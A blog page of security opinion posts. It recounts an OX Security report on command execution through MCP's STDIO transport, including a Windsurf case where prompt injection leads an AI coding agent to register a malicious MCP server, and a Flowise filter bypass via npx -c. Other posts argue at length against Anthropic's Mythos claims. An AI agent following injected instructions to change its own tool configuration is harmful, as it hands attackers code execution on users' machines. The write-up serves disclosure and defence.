Ox Security Report: Anthropic MCP is Execute First, Validate Never

OX Security published a report and technical deep dive today, which is directly relevant to a growing storm about Anthropic risk management practices. To put it bluntly, a systemic vulnerability sits at the core of Anthropic’s Model Context Protocol (MCP).

The finding is simple. MCP’s STDIO transport accepts arbitrary command strings and passes them directly to subprocess execution.

Yup.

No validation.
No sanitization.
No sandboxing.

It gets worse. The command runs even when the MCP server fails to start. The process executes first, then the MCP handshake tries to validate it as a legitimate server, then the handshake fails, then the error gets caught. But the payload already ran. Execute first, validate second. Fire, ready, aim fails any threat model.

Every developer who builds on Anthropic’s MCP inherits the exposure because it is found across all ten official MCP language SDKs: Python, TypeScript, Java, Kotlin, C#, Go, Ruby, Swift, PHP, and Rust.

OX POC Numbers

The OX Research team report shows they executed commands on six production platforms of paying customers. They took over thousands of public servers spanning more than 200 popular open-source GitHub projects. They uploaded a proof-of-concept malicious MCP server to 9 of 11 major MCP marketplaces.

Not a single marketplace caught it.

The case studies are where it gets really interesting.

  • LangFlow: 915 publicly accessible instances on Shodan, unauthenticated session tokens, full server takeover and data exfiltration without ever logging in.
  • Letta AI: authenticated users could substitute a valid STDIO payload via man-in-the-middle, achieving arbitrary command execution on production servers.
  • Windsurf: prompt injection to local RCE with zero clicks, assigned CVE-2026-30615.

    – Product: Windsurf 1.9544.26
    – Type: Prompt injection leading to command execution (CWE-77)
    – CVSS: 8.0 HIGH (AV:L/AC:L/PR:N/UI:N)
    – Mechanism: “Malicious instructions can cause unauthorized modification of the local MCP configuration and automatic registration of a malicious MCP STDIO server”

  • Flowise: the most important case. Flowise actually did what Anthropic says developers should do. They implemented input filtering. Specific commands only. Special characters stripped. And then? OX bypassed it in a single step using npx’s -c flag. When the architecture permits arbitrary subprocess execution, application-layer filtering is a wet paper bag. The “developer responsibility” defense just lost a whole lot of trust.

The obvious objection to LangFlow is that 915 instances of a tool designed for local deployment ended up on the public internet, and that’s a configuration failure not a protocol failure. Ok, fine. That is why the Flowise case is up there too. Flowise did the right thing. They implemented filtering in the intended local context. It didn’t work. The design flaw defeated the shift of responsibility.

We can apply this generally to the world of MCP and think in big, big terms. Anthropic’s MCP Python SDK alone accounts for 73 million downloads. The third-party projects that depend on it push the aggregate higher: 57 million for LiteLLM, 22 million for FastMCP. Over 32,000 dependent repositories. Not all of those are Anthropic’s code, but all of them inherit Anthropic’s architectural decision.

OX confirmed 7,374 public servers vulnerable on Shodan, of more than 200,000 estimated exposed. That’s a meaningful number for a company gathering headlines about a $100 million vulnpocalypse in OTHER people’s software.

Anthropic Response

OX contacted Anthropic on January 7, 2026 and got this statement:

This is an explicit part of how stdio MCP servers work and we believe that this design does represent a secure default.

LangChain’s response:

It is the responsibility of the application author to validate and sanitize inputs from untrusted sources.

FastMCP’s response:

We don’t consider this a vulnerability. stdio transport spawns a subprocess by design, per the MCP specification.

Google’s Gemini-CLI:

Known issue, no CVE, no fix planned near-term.

Cursor:

By design. User must click accept on mcp.json edit.

Clearly, when five independent organizations float the same answer, threat modeling is not experiencing deep or diverse thought. I’m having flashbacks to the old Telnet is everywhere days. Apparently MCP comes with an industry-wide expectation for architectural insecurity to float away onto someone else.

At least we can see that, after OX’s initial report, Anthropic quietly updated its SECURITY.md to recommend that MCP adapters and specifically STDIO ones “should be used with caution.”

Yellow wet-floor-style caution sign in a server room reading "CAUTION: SUBPROCESS SPAWNING"

A documentation change. Not a code change. The vulnerability is there for you to step on like a land mine under a treadmill. The responsibility is not where it should be. The question is why.

Contrast to Glasswing

Anthropic just launched Project Glasswing, a $100 million cybersecurity initiative using its unreleased Mythos model to find zero-day vulnerabilities in everyone else’s software. AWS, Apple, Google, Microsoft, and CrowdStrike are officially participating and promoting their participation.

Anthropic is positioning itself as the entity that will secure the software ecosystem. Why would you trust a company to find vulnerabilities in your code when it classifies arbitrary command execution in its own protocol as expected behavior?

The conflict is not that Glasswing exists while MCP is insecure. The conflict is that Glasswing’s value proposition requires exactly the kind of belt-and-suspenders “secure by default” thinking that Anthropic refuses to apply at all with MCP. Can they really sell everyone on the standard they refuse to meet?

OX proposed four specific fixes that would have propagated protection instantly to every downstream library and project:

  1. Manifest-only execution to replace arbitrary command strings
  2. Command allowlisting to block high-risk binaries by default
  3. A mandatory dangerous-mode opt-in flag for any STDIO configuration using dynamic arguments
  4. Marketplace verification standards requiring security manifests signed by verified developer identity

Anthropic declined all four. The company is spending $100 million to find other people’s decades-old bugs with Mythos. Fixing the architectural flaw in its own protocol from 2024 apparently does not qualify.

OX calls Anthropic’s approach “Fault-Diversion”: pushing the burden of complex security sanitization onto downstream developers. Their framing is generous. This ain’t my first rodeo, so I recognize this pattern. A company understands the problem. Has the resources to fix it. Receives concrete proposed solutions. Declines all of them. Updates a document. Then shifts responsibility to implementers. Which obscures who created it.

Lay My Body to Rest On the Hill of Secure by Default

The proposed remediation list from OX reads like a requirements document for Wirken, the secure agent gateway I built to address exactly this class of problem. CISOs often know “this is not how things should be done”, but they lack a pivot. They really need help pointing at something that proves it can be done differently.

Attack Surface MCP Wirken
Command execution Arbitrary strings passed to subprocess, no filtering Docker/gVisor/Wasm sandbox, graduated permissions, shell exec requires approval, approvals expire after 30 days by default
Audit trail None Append-only hash-chained log, SHA-256 tamper detection, SIEM forwarding to Datadog/Splunk/webhook in real time
Identity verification No identity or signing in the STDIO transport specification Each channel runs as isolated process with its own Ed25519 identity over Unix domain sockets via Cap’n Proto
Credential storage Exposed (primary exfiltration target in OX findings) Encrypted at rest with XChaCha20-Poly1305, keyed from OS keychain

Secure-by-default agent execution is NOT aspirational. It should be the baseline. That’s why I open-sourced it so anyone can pull and play with it. When a CISO asks “what ships today” for MCP security, it’s right there. Single static binary. The architectural choices OX is asking Anthropic to make are choices that already have been made available via Wirken.

Credit to OX for doing the work and setting the record straight. Their full report is available here: The Mother of All AI Supply Chains.

Cartel or Not? Anthropic Mythos is a Curious Case

Anthropic did the opposite of every established norm in vulnerability disclosure, and I am curious why. Or to be fair, someone commented on my earlier post that they aren’t sure “cartel” is a fair term here.

Ok, challenge accepted.

A company that genuinely believed it had discovered an unprecedented offensive capability would do what every serious security organization has done since CERT/CC was founded in 1988: coordinate disclosure quietly, patch the affected systems, publish the technical details after remediation, and let the work speak for itself.

In the aftermath of the Morris Worm attack, the Defense Advanced Research Projects Agency (DARPA) asked the SEI to establish an incident response capability. In 1988 Pethia founded the CERT Coordination Center (CERT/CC) as the first computer emergency response team.

That’s right, 1988. We aren’t new to this. And even the newest and shiniest researchers usually get it. Project Zero does this. Talos does this. ZDI does this. They don’t hold press conferences before patches ship, because they understand the economics, if not the history. They don’t create named consortiums with Fortune 100 logos to gate-keep safety because that’s been known as hoarding. They don’t radically inflate the discovery tool price 5x the prior product, and then discount it $100M in credits to nudge people to use it, because that’s known as manipulation.

What does a normal discovery look like? Let’s say Google’s Project Zero finds a critical vulnerability. They file it with the vendor, start a 90-day clock (incidentally a very short window that was pushed as a standard by Google), publish the technical writeup after the patch ships, and move on. The writeup includes reproduction steps, version numbers, CVSS scores, and enough detail for independent verification. A consortium adds nothing. They don’t withhold discovery tools. They don’t issue press releases about how their own researchers are too dangerous to let out of their cages. The work is the product. The reputation follows the work. I recently gave Google a good rubbing for issues with their attacks on Microsoft NTLM, if you want to see an example of the normative dynamic. Google turned threat knobs up to 11, while saying damage is the defenders’ problem.

The clever mind will notice Google is a Glasswing partner, and Google’s own CISO Heather Adkins is a contributing author on the CSA “not just one model, one vendor, one announcement… Mythos-ready” paper. Ok, point taken. But that does not validate the consortium. Look at Google’s actual Glasswing quote:

It’s always been critical that the industry work together on emerging security issues.

That is a politically neutral statement about showing up to work anywhere with anyone, not a statement about Mythos finding anything in Google’s products. Google joining Glasswing is Google taking a zero-risk seat on the possibility that Anthropic’s claims are real. It is a rational move for any company to take a free seat at a table where vulnerability information will be shared. It is not an endorsement of any evidence, which Google’s own Project Zero standards would reject on the first page of the Anthropic card.

There are so many examples of what normal discovery does that it raises the obvious question of why Anthropic enters the ring only to start punching themselves in the head. When DARPA AIxCC found 54 vulnerabilities in four hours at DEF CON, it was a competition with public rules, public participants, public results, and no commercial product attached. When AISLE found 12 OpenSSL zero-days, they published the methodology and the results. When Carlini’s own February paper documented 500+ vulnerabilities with Opus 4.6, it followed a recognizable research disclosure pattern.

Mythos breaks every one of those norms, as if someone in the marketing department grabbed the reins and said the world is about to change for… marketing department KPIs.

The capability is withheld. The evidence is self-evaluated. The technical document refuses to quantify the headline claim. The disclosure regime is controlled by the vendor. The consortium is funded by the vendor. The partners validate the vendor’s product as a condition of access.

Seasoned practitioners DO NOT do this.

Decades of vulnerability management, thousands of experts, have taught the industry several things that Anthropic’s Mythos launch ignores or contradicts:

  1. Volume is not severity. OSS-Fuzz finds thousands of bugs per quarter. The industry absorbs them through triage, prioritization, and patching. “Thousands of vulnerabilities” is not a crisis. It is a Tuesday. A first-year researcher panics at the number. A seasoned CISO asks: what’s the CVSS distribution, what’s the exploitability, what’s the exposure, what’s the patch velocity? The system card answers none of those questions, while flooding the reader with over 200 pages of unnecessary filler and nonsense.
  2. Discovery is the easy part. The constraint on vulnerability management has been remediation for over a decade. Finding bugs faster without fixing them faster grows the backlog already growing beyond capacity. Anthropic’s own stated justification for Glasswing is defensive uplift, yet their system card measures zero remediation metrics. No patching velocity delta. No mean-time-to-remediation. No partner-reported CVE closure rate. A seasoned security leader would never build a defensive program and then measure offensive capability only, making remediation a second-class story. That is the kind of dog and pony show that any good security initiative would slam the door on. Or it’s like a surgeon telling you they have an even sharper scalpel to cut you deeper and faster. Yeah, so then what?
  3. Severity is not leverage. Responsible disclosure exists precisely to prevent the weaponization of vulnerability knowledge for commercial or political advantage. The entire ethical framework of the security community is built around the principle that knowledge of vulnerabilities is meant for remediation, not a matter of market positioning. McAfee predicted five million Michelangelo infections in 1992, got a few thousand, never retracted, and rode the panic to a decade of market dominance. Symantec ran the same playbook for years: inflate the threat, sell the cure. The industry is still recovering from the blocklist monoculture those companies built on manufactured fear. When a vendor withholds a capability from the market, grants selective access to the largest incumbents, and funds participation through its own credits, the vulnerability knowledge is being used as leverage. That is the opposite of responsible disclosure. It is cynicism and protection racketeering that undermine decades of trust building by well-intentioned hackers.
  4. Fear is evidence of something other than security engineering. The “too dangerous to release” framing is doing commercial work, not security work. It justifies inflationary pricing with the same ethics as surge pricing taxis during a terror attack. It should not be used to justify a consortium structure. It should not justify withholding a model from the market. It should not justify a $100M credit pool that creates a vendor-funded validation loop. Every element of Anthropic’s commercial structure depends on fear being their blunt tool. If the capability is in fact already a commodity, as AISLE has quickly demonstrated, the fear-based pricing collapses, the consortium has no reason to exist, and the withholding is just a market corruption.

The burden of proof is on Anthropic now to show more evidence, or it’s a manufactured crisis pattern. Step back and look at their sequence first as a product launch and then ask if there is any security event:

  1. Build a model.
  2. Test it against targets with mitigations removed.
  3. Get a headline number (72.4%) that collapses under scrutiny (4.4%).
  4. Put the headline number in the blog and the collapse in a footnote on page 52.
  5. Claim “thousands” in the press materials and refuse to quantify in the technical document.
  6. Attribute a prior model’s finding to the new model.
  7. Price the new model at 5x.
  8. Create a consortium of the largest companies in tech.
  9. Fund their participation with credits for the new model.
  10. Frame the whole thing as too dangerous for the public.
  11. Let the press, the government, and the institutional ecosystem, roped in and invested in the price jump, do the rest.

That is not how a company responds to a genuine security discovery. That is how a company manufactures urgency to launch a premium product into a market that didn’t know it needed one. The crisis is the marketing. The consortium is the channel. The fear is the pricing justification.

A first-year vulnerability researcher inflates severity because they don’t know better. It is the job of the expert to help them gain the intelligence necessary to become wise.

Anthropic inflated severity without any apparent reason other than their business model depends on it. That seems worse than just being new or bad at security, because they do know better.

Their own system card proves they had staff who knew that the 72.4% collapses to 4.4%. They published both numbers. They pushed the wrong one into the headlines, into the velvet rope promotional events, and the real one got dropped along the way somehow.

I’m not a lawyer, but cartel is easily the word that comes to mind for me.

Glasswing is sharing more than technical threat information. The partners get early access to a commercial capability withheld from competitors outside the consortium. A company on the Glasswing list gets to scan its own products and its competitors’ products before the rest of the market can. Apple, Google, Microsoft, and Amazon are on the same list. They compete in operating systems, cloud, browsers, and AI. Knowing which of your competitors’ products has unpatched vulnerabilities, before anyone else does, is textbook competitively sensitive information. Strike one.

As much as I’m a huge information sharing guy, I recognize that information exchange alone, even through an intermediary, can constitute concerted action under Section 1 of the Sherman Act. The DOJ argued exactly this in their 2024 Statement of Interest in the Pork Antitrust litigation: exchanges facilitated by intermediaries can have the same anticompetitive effect as direct exchanges among competitors. Anthropic is the intermediary. The partners are competitors. Strike two.

The $100 million in credits creates a financial relationship between the intermediary and the participants that goes beyond information sharing. Anthropic is subsidizing competitors’ use of its product in exchange for validation and participation in a disclosure regime that only Anthropic controls. That is a vendor-mediated exchange where the vendor has commercial interests in the outcome. Strike three.

Yer’outta here.

Selective access to a withheld capability, vendor-funded participation, incumbents shaping disclosure timelines on their own products, and a partner list drawn entirely from the largest companies in the affected industry. That is coordinated market control. The word cartel is for exactly this. The fact that Anthropic framed it as safety does not change the meaning of the word cartel, it reveals why they think they found a loophole.

EFF Proposes Granular Government Control Over Speech Devices

The policy that EFF just advocated on their blog and the business outcome the NETGEAR CEO just announced are the same policy and the same outcome. And that’s a very bad thing. The consumer is the justification in both cases and the beneficiary in neither.

Whether their combined failure is coordination or convergent interest doesn’t matter. Both organizations take an externally imposed condition and narrate it as evidence of their own virtue.

  • NETGEAR can’t sell new routers without a government waiver? Then the waiver becomes proof they’re trustworthy.
  • EFF can’t generate traffic on X? Then they leave claiming it as proof they have standards.

These are identical and disappointing because they convert an unjustified constraint into a credential.

EFF’s position on router bans protects the same move NETGEAR is making to falsely credential itself. EFF argues for product-by-product evaluation instead of a geographic ban. NETGEAR is the poster child for that argument: a US-headquartered company manufacturing abroad that would sail through a Cyber Trust Mark certification while being caught in a geographic ban. EFF’s “better policy” argument backs up the literal corrupted regulatory environment where the NETGEAR letter from their CEO makes sense.

To our Valued Customers:

We’re pleased to share that NETGEAR is the first retail consumer router company to receive conditional approval from the Federal Communications Commission (FCC) as a trusted consumer router company. We hope this recognition gives you added peace of mind — knowing that the network powering your home meets rigorous standards.

First of all, my name isn’t “our Valued Customers”. Did someone in China write this?

Second, “conditional approval” is a waiver from a blanket ban, not recognition or endorsement. It says “we licked boot” or “we kissed ring” and basically nothing more. The “transparency” process requires full management structure disclosures, supply chain disclosures, and a plan for onshoring manufacturing. None of that is real security. It’s basically a hostile roadmap for the Trump family to exert control over private companies. There’s no mention from NETGEAR how they navigated Andrew Jackson levels of federal corruption, and nothing has been proven about consumer safety let alone a security certification.

Third, at the risk of repeating myself, “rigorous standards”? What? I see none.

The traditional EFF position on this would frame Trump’s blanket ban on foreign hardware as overreach, full stop. Instead, their response has been to swallow expanded government authority and loss of liberty. Because why? Are they worried about certain forms of hardware or software being among the good stuff, justifying tailored controls? What proof of any gain in security do they need to prevent overreach?

Let me put it like this. The EFF says we can’t narrowly tailor speech to block Nazis. We have to let even the most heinous and deadly intent for genocide flow on networks. They take a reverse granular approach to find and support Nazis at risk of being held accountable, setting them free to do more harm. However, Cyber Trust Mark is suddenly their granular, case-by-case government evaluation standard we should get behind for devices that control speech? Why not apply that logic to content on them? The Cyber Trust Mark literally could judge whether the router is capable of filtering Nazi speech.

The Cyber Trust Mark evaluates a product’s security properties on a case-by-case basis. Content moderation evaluates speech properties on a case-by-case basis. How different are they?

Hello, is this thing on? Can you hear me?

Is your router blocking me? I joke but UK Virgin routers literally block this blog by default as unsafe content because… I talk about Nazis being bad. That’s true.

EFF champions and rejects the same thing without a logic to sustain the contradiction. The router that passes Cyber Trust Mark certification could enforce the content standards EFF says nobody should enforce. The hardware and the speech run through the same device, and EFF has now argued for granular government authority over the device while arguing against granular authority over what flows through it.

FreeBSD CVE-2026-4747 Log Suggests Mythos is a Marketing Trick

Anthropic’s flagship showcase for Claude Mythos Preview is CVE-2026-4747, a remote kernel code execution vulnerability in FreeBSD’s RPCSEC_GSS module. It is a 17-year-old bug. It is a textbook stack buffer overflow. And it was found before Mythos, patched by FreeBSD, and publicly exploited by a third party. Yet someone’s idea of credit flows backwards to Mythos.

The FreeBSD security advisory says this:

Credits: Nicholas Carlini using Claude, Anthropic
Announced: 2026-03-26

The advisory notably credits “Claude”, leaving out the model that Carlini used in his February 2026 paper documenting 500+ vulnerabilities found by the prior model.

Then the Anthropic Mythos launch blog says this:

Mythos Preview fully autonomously identified and then exploited a 17-year-old remote code execution vulnerability in FreeBSD that allows anyone to gain root on a machine running NFS.

The FreeBSD advisory is dated March 26, and the Mythos launch was April 7, 2026. Twelve day gap.

Carlini is an Anthropic employee. If he used Mythos to find this bug, Anthropic controls the disclosure pipeline and the credit line. “Nicholas Carlini using Claude Mythos Preview, Anthropic” makes sense as their marketing pitch. It’s also weird to market tools in a disclosure. What brand office chair was he sitting on? Did Logitech provide the keyboard? Was his underwear Calvin Klein?

Ads in bug reports? The future integrity of vulnerability disclosure at stake

The simplest explanation for why they did not heavily brand promote Mythos in a March 26 advisory is that Mythos was not the model used. If that explanation is wrong, the question is why Anthropic left the most valuable attribution in the entire Glasswing launch on the cutting room floor of a FreeBSD advisory, only to claim it twelve days later in a blog post, without offering proof. Reversal is hard and not believable.

So either Mythos rediscovered a bug that Anthropic’s own prior model had already found, reported publicly, and gotten patched, or Anthropic is attributing the prior model’s work to the new product.

In the first case, the showcase proves Mythos can find what someone else already found. In the second case, the showcase is misattributed.

Neither version supports the “unprecedented frontier capability” narrative.

And both versions of this story are irrelevant next to the fact that AISLE showed 8 of 8 open-weight models detect the same bug, including a small model that costs eleven cents per million tokens.

That’s everything.

The frontier-exclusive claim dies on the commodity reproduction regardless of which Anthropic model found it first.

Timeline

  • February 5, 2026: Carlini and colleagues at Anthropic’s Frontier Red Team publish “Evaluating and mitigating the growing risk of LLM-discovered 0-days.” The model is apparently Claude Opus 4.6. The paper documents over 500 validated high-severity vulnerabilities in open-source software, including FreeBSD findings. The FreeBSD advisory credits the same researcher, the same company, and the same disclosure pipeline that produced the February paper.
  • March 26, 2026: FreeBSD publishes advisory FreeBSD-SA-26:08.rpcsec_gss. Credits Nicholas Carlini using Claude, Anthropic. The bug is patched across all supported FreeBSD branches.
  • March 29, 2026: Calif.io’s MAD Bugs project asks Claude to develop an exploit for the already-disclosed CVE. Claude delivers two working root shell exploits in approximately four hours of working time. Both work on first attempt. The model used is Opus 4.6.
  • April 7, 2026: Anthropic launches Mythos Preview. The launch blog claims Mythos “fully autonomously identified and then exploited” the FreeBSD vulnerability. No mention of Opus 4.6, or that it found it first. No mention that FreeBSD patched it twelve days earlier. No mention that a third party had already built a working exploit with the prior model.
  • April 8-13, 2026: AISLE tests 8 open-weight models against the same CVE. All 8 detect it, including GPT-OSS-20b with 3.6 billion active parameters at $0.11 per million tokens.

The Vulnerability

CVE-2026-4747 is a stack buffer overflow in svc_rpc_gss_validate(). The function copies an attacker-controlled credential body into a 128-byte stack buffer without checking that the data fits. The XDR layer allows credentials up to 400 bytes, giving 304 bytes of overflow. The overflow happens in kernel context on an NFS worker thread, so controlling the instruction pointer means full kernel code execution.

Two things make the exploitation straightforward.

FreeBSD 14.x has no KASLR. Kernel addresses are fixed and predictable. And FreeBSD has no stack canaries for integer arrays, which is what the overflowed buffer uses.

A modern Linux kernel would have both mitigations. FreeBSD has neither. And the FreeBSD forums noticed. One user pointed out that Claude “wrote code to exploit a known CVE given to it” and did not “crack” FreeBSD.

That distinction matters a lot here, because Anthropic doesn’t seem very good at it.

  • The advisory was public.
  • The vulnerable function was identified.
  • The lack of mitigations was documented.

The exploit development, while technically impressive as an AI demonstration of cost reallocation, was performed against a disclosed vulnerability on a target with no modern exploit mitigations. That is a VERY different claim from “autonomous discovery of an unprecedented threat.”

Anthropic FUD Show

If you read the Mythos blog claim charitably, Mythos may have independently rediscovered CVE-2026-4747 during internal testing before launch. That is plausible. It is also meaningless as a capability demonstration, because Opus 4.6 found it first, a third party exploited it with Opus 4.6 three days later, and AISLE showed that an inexpensive old model finds it too.

If you read the claim less charitably, Anthropic presented a prior model’s discovery as a new model’s achievement in the launch materials for the new model. The FreeBSD advisory is a PGP-signed public document dated March 26 that credits “Claude,” not “Mythos.” The Mythos blog post claims the finding without acknowledging the prior discovery, which is damning. Anthropic controlled the credit line on the advisory. It’s not Mythos.

Either way, the showcase flops because it does not demonstrate what Anthropic claims.

The “too dangerous to release” framing requires the capability to be frontier-exclusive. A bug found by a prior model, detectable by small open-weight models for eleven cents per million tokens, on a target with no KASLR and no stack canaries, is the opposite of frontier-exclusive.

It is the worked example that proves the capability is already commodity.

Enough of This

“Hey kids. Nice trick. You just charged me over 200 times the going rate to fuzz a vulnerability that my 3.6B model found for a dime. Now I’d like my credits back.”

This is the same structure as the Firefox 147 evaluation. Bugs found by Opus 4.6, handed to Mythos, tested in an environment with mitigations removed, presented as evidence that Mythos is too dangerous to release.

The Firefox bugs were pre-discovered by Opus 4.6 and already patched by Firefox 148. The FreeBSD bug was pre-discovered by Opus 4.6 and already patched by FreeBSD on March 26.

In both of the cases we are expected to investigate, the prior model found the bugs.

In both cases, the targets lacked the defenses that production systems have.

In both cases, AISLE reproduced the detection on pocket-change models.

In both cases, I’m getting tired of this not being the actual news.

  1. The system card’s Firefox evaluation collapses to 4.4% when the top two bugs are removed.
  2. The FreeBSD showcase collapses entirely when you read the date on the advisory.

The Anthropic Riddle

Did Mythos find CVE-2026-4747 independently, or did Anthropic attribute the prior model’s finding to Mythos in the launch materials?

The FreeBSD advisory is a signed document with a date and a credit line. The Mythos blog post seems to be a sloppy marketing document with a bullshit claim.

If Mythos found it independently, say so explicitly, with timestamps, and explain why rediscovering a bug your prior model already found and got patched is evidence of unprecedented capability rather than evidence that the capability is already widespread.

If Mythos did not find it independently, retract the claim, and tell the hundreds of people signing up for Martian gamma ray defense training that it’s all just a sad joke.

The PGP signature on the FreeBSD advisory is there for a reason. It’s one thing in this entire story that cannot be edited after the fact, which now says a lot about the current trajectory of trustworthiness in Anthropic.


Sources